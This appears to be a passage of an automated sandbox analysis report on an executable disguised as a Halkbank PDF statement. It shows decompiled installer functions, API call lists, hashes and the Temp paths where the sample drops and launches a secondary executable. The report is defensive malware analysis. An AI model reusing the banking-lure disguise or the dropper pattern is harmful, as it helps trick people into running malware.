                                                      • Associated: 00000000.00000002.313018431.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313185127.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                      • String ID: "C:\Users\user\AppData\Local\Temp\vokkqsp.exe" C:\Users\user\AppData\Local\Temp\kxgycvzd.lwf$N
                                                      • API String ID: 3103080414-1902310935
                                                      • Opcode ID: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                                                      • Instruction ID: 690b4d321b533a2a97605fa3f7bb2423a24794fe1ec6c961d913f822d5f12d1b
                                                      • Opcode Fuzzy Hash: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                                                      • Instruction Fuzzy Hash: AB6181F1900209FFDB109F61CD85A6A7B69FB84304F00813AF705B62E0C7799951DFA9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004062AE Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 130memorystringCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E004062AE(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x426de8 = 0x55004e;
				 *0x426dec = 0x4c;
				if(_t44 == 0) {
					L3:
					_t2 = _t52 + 0x1c; // 0x4275e8
					_t12 = GetShortPathNameW( *_t2, 0x4275e8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x4269e8, "%ls=%ls\r\n", 0x426de8, 0x4275e8);
						_t53 = _t52 + 0x10;
						E004066A5(_t37, 0x400, 0x4275e8, 0x4275e8,  *((intOrPtr*)( *0x42a270 + 0x128)));
						_t12 = E00406158(0x4275e8, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E004061DB(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E004060BD(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E004060BD(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00406113(_t24 + _t46, 0x4269e8, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E0040620A(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00406158(_t44, 0, 1));
					_t12 = GetShortPathNameW(_t44, 0x426de8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}



















                                                      0x004062ae
                                                      0x004062b7
                                                      0x004062be
                                                      0x004062c8
                                                      0x004062dc
                                                      0x00406304
                                                      0x0040630b
                                                      0x0040630f
                                                      0x00406313
                                                      0x00406333
                                                      0x0040633a
                                                      0x00406344
                                                      0x00406351
                                                      0x00406356
                                                      0x0040635b
                                                      0x0040635f
                                                      0x0040636e
                                                      0x00406370
                                                      0x0040637d
                                                      0x00406381
                                                      0x0040641c
                                                      0x00000000
                                                      0x00406397
                                                      0x004063a4
                                                      0x004063c8
                                                      0x004063cc
                                                      0x004063eb
                                                      0x004063ef
                                                      0x004063ef
                                                      0x004063f1
                                                      0x004063fa
                                                      0x00406405
                                                      0x00406410
                                                      0x00406416
                                                      0x00000000
                                                      0x00406416
                                                      0x004063ce
                                                      0x004063d1
                                                      0x004063dc
                                                      0x004063d8
                                                      0x004063da
                                                      0x004063db
                                                      0x004063db
                                                      0x004063e3
                                                      0x004063e5
                                                      0x00000000
                                                      0x004063e5
                                                      0x004063af
                                                      0x004063b5
                                                      0x00000000
                                                      0x004063b5
                                                      0x00406381
                                                      0x0040635f
                                                      0x004062de
                                                      0x004062e9
                                                      0x004062f2
                                                      0x004062f6
                                                      0x00000000
                                                      0x00000000
                                                      0x004062f6
                                                      0x00406427

                                                      APIs
                                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406449,?,?), ref: 004062E9
                                                      • GetShortPathNameW.KERNEL32 ref: 004062F2
                                                        • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                                                        • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                                                      • GetShortPathNameW.KERNEL32 ref: 0040630F
                                                      • wsprintfA.USER32 ref: 0040632D
                                                      • GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?,?,?,?,?), ref: 00406368
                                                      • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406377
                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063AF
                                                      • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 00406405
                                                      • GlobalFree.KERNEL32 ref: 00406416
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040641D
                                                        • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe,80000000,00000003), ref: 0040615C
                                                        • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.313010361.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.313005023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313018431.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313185127.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                      Similarity
                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                      • String ID: %ls=%ls$[Rename]$mB$uB$uB
                                                      • API String ID: 2171350718-2295842750
                                                      • Opcode ID: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
                                                      • Instruction ID: df9b4e9fb9d32bd4c250032a1d399944af7a2e4c2f0bdec2b7d3959d12e60cc8
                                                      • Opcode Fuzzy Hash: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
                                                      • Instruction Fuzzy Hash: B8314331200315BBD2206B619D49F5B3AACEF85704F16003BFD02FA2C2EA7DD82186BD
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 90%
                                                      			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42a270;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x429260, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42a268;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}













                                                      0x0040100a
                                                      0x00401039
                                                      0x00401047
                                                      0x0040104d
                                                      0x00401051
                                                      0x0040105b
                                                      0x00401061
                                                      0x00401064
                                                      0x004010f3
                                                      0x00401089
                                                      0x0040108c
                                                      0x004010a6
                                                      0x004010bd
                                                      0x004010cc
                                                      0x004010cf
                                                      0x004010d5
                                                      0x004010d9
                                                      0x004010e4
                                                      0x004010ed
                                                      0x004010ef
                                                      0x004010ef
                                                      0x00401100
                                                      0x00401105
                                                      0x0040110d
                                                      0x00401110
                                                      0x00401112
                                                      0x00401118
                                                      0x0040111f
                                                      0x00401126
                                                      0x00401130
                                                      0x00401142
                                                      0x00401156
                                                      0x00401160
                                                      0x00401165
                                                      0x00401165
                                                      0x00401110
                                                      0x0040116e
                                                      0x00000000
                                                      0x00401178
                                                      0x00401010
                                                      0x00401013
                                                      0x00401015
                                                      0x0040101f
                                                      0x0040101f
                                                      0x00000000

                                                      APIs
                                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                      • GetClientRect.USER32 ref: 0040105B
                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                      • FillRect.USER32 ref: 004010E4
                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                      • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                      • DrawTextW.USER32(00000000,00429260,000000FF,00000010,00000820), ref: 00401156
                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.313010361.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.313005023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313018431.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313185127.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                      Similarity
                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                      • String ID: F
                                                      • API String ID: 941294808-1304234792
                                                      • Opcode ID: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                                                      • Instruction ID: e2f9fea5dfd6f059ba8eeb08e8d10ac227d01a2162b8a260283931f50cd0bfbf
                                                      • Opcode Fuzzy Hash: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                                                      • Instruction Fuzzy Hash: 33418B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0C7349A55DFA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004066A5 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 196stringCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 72%
                                                      			E004066A5(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
				struct _ITEMIDLIST* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t44;
				WCHAR* _t45;
				signed char _t47;
				signed int _t48;
				short _t59;
				short _t61;
				short _t63;
				void* _t71;
				signed int _t77;
				signed int _t78;
				short _t81;
				short _t82;
				signed char _t84;
				signed int _t85;
				void* _t98;
				void* _t104;
				intOrPtr* _t105;
				void* _t107;
				WCHAR* _t108;
				void* _t110;

				_t107 = __esi;
				_t104 = __edi;
				_t71 = __ebx;
				_t44 = _a8;
				if(_t44 < 0) {
					_t44 =  *( *0x42923c - 4 + _t44 * 4);
				}
				_push(_t71);
				_push(_t107);
				_push(_t104);
				_t105 =  *0x42a298 + _t44 * 2;
				_t45 = 0x428200;
				_t108 = 0x428200;
				if(_a4 >= 0x428200 && _a4 - 0x428200 >> 1 < 0x800) {
					_t108 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				_t81 =  *_t105;
				_a8 = _t81;
				if(_t81 == 0) {
					L43:
					 *_t108 =  *_t108 & 0x00000000;
					if(_a4 == 0) {
						return _t45;
					}
					return E00406668(_a4, _t45);
				} else {
					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
						_t98 = 2;
						_t105 = _t105 + _t98;
						if(_t81 >= 4) {
							if(__eflags != 0) {
								 *_t108 = _t81;
								_t108 = _t108 + _t98;
								__eflags = _t108;
							} else {
								 *_t108 =  *_t105;
								_t108 = _t108 + _t98;
								_t105 = _t105 + _t98;
							}
							L42:
							_t82 =  *_t105;
							_a8 = _t82;
							if(_t82 != 0) {
								_t81 = _a8;
								continue;
							}
							goto L43;
						}
						_t84 =  *((intOrPtr*)(_t105 + 1));
						_t47 =  *_t105;
						_t48 = _t47 & 0x000000ff;
						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
						_t85 = _t84 & 0x000000ff;
						_v28 = _t48 | 0x00008000;
						_t77 = 2;
						_v16 = _t85;
						_t105 = _t105 + _t77;
						_v24 = _t48;
						_v20 = _t85 | 0x00008000;
						if(_a8 != _t77) {
							__eflags = _a8 - 3;
							if(_a8 != 3) {
								__eflags = _a8 - 1;
								if(__eflags == 0) {
									__eflags = (_t48 | 0xffffffff) - _v12;
									E004066A5(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
								}
								L38:
								_t108 =  &(_t108[lstrlenW(_t108)]);
								_t45 = 0x428200;
								goto L42;
							}
							_t78 = _v12;
							__eflags = _t78 - 0x1d;
							if(_t78 != 0x1d) {
								__eflags = (_t78 << 0xb) + 0x42b000;
								E00406668(_t108, (_t78 << 0xb) + 0x42b000);
							} else {
								E004065AF(_t108,  *0x42a268);
							}
							__eflags = _t78 + 0xffffffeb - 7;
							if(__eflags < 0) {
								L29:
								E004068EF(_t108);
							}
							goto L38;
						}
						if( *0x42a2e4 != 0) {
							_t77 = 4;
						}
						_t121 = _t48;
						if(_t48 >= 0) {
							__eflags = _t48 - 0x25;
							if(_t48 != 0x25) {
								__eflags = _t48 - 0x24;
								if(_t48 == 0x24) {
									GetWindowsDirectoryW(_t108, 0x400);
									_t77 = 0;
								}
								while(1) {
									__eflags = _t77;
									if(_t77 == 0) {
										goto L26;
									}
									_t59 =  *0x42a264;
									_t77 = _t77 - 1;
									__eflags = _t59;
									if(_t59 == 0) {
										L22:
										_t61 = SHGetSpecialFolderLocation( *0x42a268,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
										__eflags = _t61;
										if(_t61 != 0) {
											L24:
											 *_t108 =  *_t108 & 0x00000000;
											__eflags =  *_t108;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v8, _t108);
										_a8 = _t61;
										__imp__CoTaskMemFree(_v8);
										__eflags = _a8;
										if(_a8 != 0) {
											goto L26;
										}
										goto L24;
									}
									_t63 =  *_t59( *0x42a268,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
									__eflags = _t63;
									if(_t63 == 0) {
										goto L26;
									}
									goto L22;
								}
								goto L26;
							}
							GetSystemDirectoryW(_t108, 0x400);
							goto L26;
						} else {
							E00406536( *0x42a298, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a298 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
							if( *_t108 != 0) {
								L27:
								if(_v16 == 0x1a) {
									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L29;
							}
							E004066A5(_t77, _t105, _t108, _t108, _v16);
							L26:
							if( *_t108 == 0) {
								goto L29;
							}
							goto L27;
						}
					}
					goto L43;
				}
			}





























                                                      0x004066a5
                                                      0x004066a5
                                                      0x004066a5
                                                      0x004066ab
                                                      0x004066b0
                                                      0x004066c1
                                                      0x004066c1
                                                      0x004066c9
                                                      0x004066ca
                                                      0x004066cb
                                                      0x004066cc
                                                      0x004066cf
                                                      0x004066d7
                                                      0x004066d9
                                                      0x004066ea
                                                      0x004066ed
                                                      0x004066ed
                                                      0x004066f1
                                                      0x004066f7
                                                      0x004066fa
                                                      0x004068d5
                                                      0x004068d5
                                                      0x004068e0
                                                      0x004068ec
                                                      0x004068ec
                                                      0x00000000
                                                      0x00406700
                                                      0x00406705
                                                      0x0040671a
                                                      0x0040671b
                                                      0x00406721
                                                      0x004068b3
                                                      0x004068c1
                                                      0x004068c4
                                                      0x004068c4
                                                      0x004068b5
                                                      0x004068b8
                                                      0x004068bb
                                                      0x004068bd
                                                      0x004068bd
                                                      0x004068c6
                                                      0x004068c6
                                                      0x004068cc
                                                      0x004068cf
                                                      0x00406702
                                                      0x00000000
                                                      0x00406702
                                                      0x00000000
                                                      0x004068cf
                                                      0x00406727
                                                      0x0040672a
                                                      0x00406739
                                                      0x00406740
                                                      0x0040674c
                                                      0x0040674f
                                                      0x00406752
                                                      0x00406753
                                                      0x00406758
                                                      0x0040675e
                                                      0x00406761
                                                      0x00406764
                                                      0x00406857
                                                      0x0040685c
                                                      0x0040688f
                                                      0x00406894
                                                      0x00406899
                                                      0x0040689e
                                                      0x0040689e
                                                      0x004068a3
                                                      0x004068a9
                                                      0x004068ac
                                                      0x00000000
                                                      0x004068ac
                                                      0x0040685e
                                                      0x00406861
                                                      0x00406864
                                                      0x00406879
                                                      0x00406880
                                                      0x00406866
                                                      0x0040686d
                                                      0x0040686d
                                                      0x00406888
                                                      0x0040688b
                                                      0x0040684f
                                                      0x00406850
                                                      0x00406850
                                                      0x00000000
                                                      0x0040688b
                                                      0x00406771
                                                      0x00406775
                                                      0x00406775
                                                      0x00406776
                                                      0x00406778
                                                      0x004067b5
                                                      0x004067b8
                                                      0x004067c8
                                                      0x004067cb
                                                      0x004067d3
                                                      0x004067d9
                                                      0x004067d9
                                                      0x00406834
                                                      0x00406834
                                                      0x00406836
                                                      0x00000000
                                                      0x00000000
                                                      0x004067dd
                                                      0x004067e2
                                                      0x004067e3
                                                      0x004067e5
                                                      0x004067fc
                                                      0x0040680a
                                                      0x00406810
                                                      0x00406812
                                                      0x00406830
                                                      0x00406830
                                                      0x00406830
                                                      0x00000000
                                                      0x00406830
                                                      0x00406818
                                                      0x00406821
                                                      0x00406824
                                                      0x0040682a
                                                      0x0040682e
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040682e
                                                      0x004067f6
                                                      0x004067f8
                                                      0x004067fa
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004067fa
                                                      0x00000000
                                                      0x00406834
                                                      0x004067c0
                                                      0x00000000
                                                      0x0040677a
                                                      0x00406798
                                                      0x004067a1
                                                      0x0040683e
                                                      0x00406842
                                                      0x0040684a
                                                      0x0040684a
                                                      0x00000000
                                                      0x00406842
                                                      0x004067ab
                                                      0x00406838
                                                      0x0040683c
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040683c
                                                      0x00406778
                                                      0x00000000
                                                      0x00406705

                                                      APIs
                                                      • GetSystemDirectoryW.KERNEL32("C:\Users\user\AppData\Local\Temp\vokkqsp.exe" C:\Users\user\AppData\Local\Temp\kxgycvzd.lwf,00000400), ref: 004067C0
                                                      • GetWindowsDirectoryW.KERNEL32("C:\Users\user\AppData\Local\Temp\vokkqsp.exe" C:\Users\user\AppData\Local\Temp\kxgycvzd.lwf,00000400,00000000,00422728,?,00405701,00422728,00000000,00000000,00000000,00000000), ref: 004067D3
                                                      • lstrcatW.KERNEL32("C:\Users\user\AppData\Local\Temp\vokkqsp.exe" C:\Users\user\AppData\Local\Temp\kxgycvzd.lwf,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                      • lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\vokkqsp.exe" C:\Users\user\AppData\Local\Temp\kxgycvzd.lwf,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.313010361.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.313005023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313018431.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313185127.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                      Similarity
                                                      • API ID: Directory$SystemWindowslstrcatlstrlen
                                                      • String ID: "C:\Users\user\AppData\Local\Temp\vokkqsp.exe" C:\Users\user\AppData\Local\Temp\kxgycvzd.lwf$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                      • API String ID: 4260037668-152412294
                                                      • Opcode ID: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
                                                      • Instruction ID: 414c90a3e727c3679fd522760d05a71ccfd37451a898d0680c6fb4b4ce958948
                                                      • Opcode Fuzzy Hash: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
                                                      • Instruction Fuzzy Hash: CD61E172A02115EBDB20AF64CD40BAA37A5EF10314F22C13EE946B62D0DB3D49A1CB5D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004056CA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E004056CA(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x429244;
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x42a314;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E004066A5(_t38, 0, 0x422728, 0x422728, _a4);
					}
					_t27 = lstrlenW(0x422728);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x429228, 0x422728);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x422728;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x422728[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x422728, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

















                                                      0x004056d0
                                                      0x004056da
                                                      0x004056df
                                                      0x004056e5
                                                      0x004056f0
                                                      0x004056f3
                                                      0x004056f6
                                                      0x004056fc
                                                      0x004056fc
                                                      0x00405702
                                                      0x0040570a
                                                      0x0040570d
                                                      0x0040572a
                                                      0x0040572e
                                                      0x00405737
                                                      0x00405737
                                                      0x00405741
                                                      0x0040574a
                                                      0x00405756
                                                      0x0040575d
                                                      0x00405761
                                                      0x00405764
                                                      0x00405777
                                                      0x00405785
                                                      0x00405785
                                                      0x00405789
                                                      0x0040578b
                                                      0x0040578e
                                                      0x00000000
                                                      0x0040578e
                                                      0x0040570f
                                                      0x00405717
                                                      0x0040571f
                                                      0x00405725
                                                      0x00000000
                                                      0x00405725
                                                      0x0040571f
                                                      0x0040570d
                                                      0x0040579a

                                                      APIs
                                                      • lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                      • lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                      • lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                      • SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                        • Part of subcall function 004066A5: lstrcatW.KERNEL32("C:\Users\user\AppData\Local\Temp\vokkqsp.exe" C:\Users\user\AppData\Local\Temp\kxgycvzd.lwf,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                        • Part of subcall function 004066A5: lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\vokkqsp.exe" C:\Users\user\AppData\Local\Temp\kxgycvzd.lwf,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
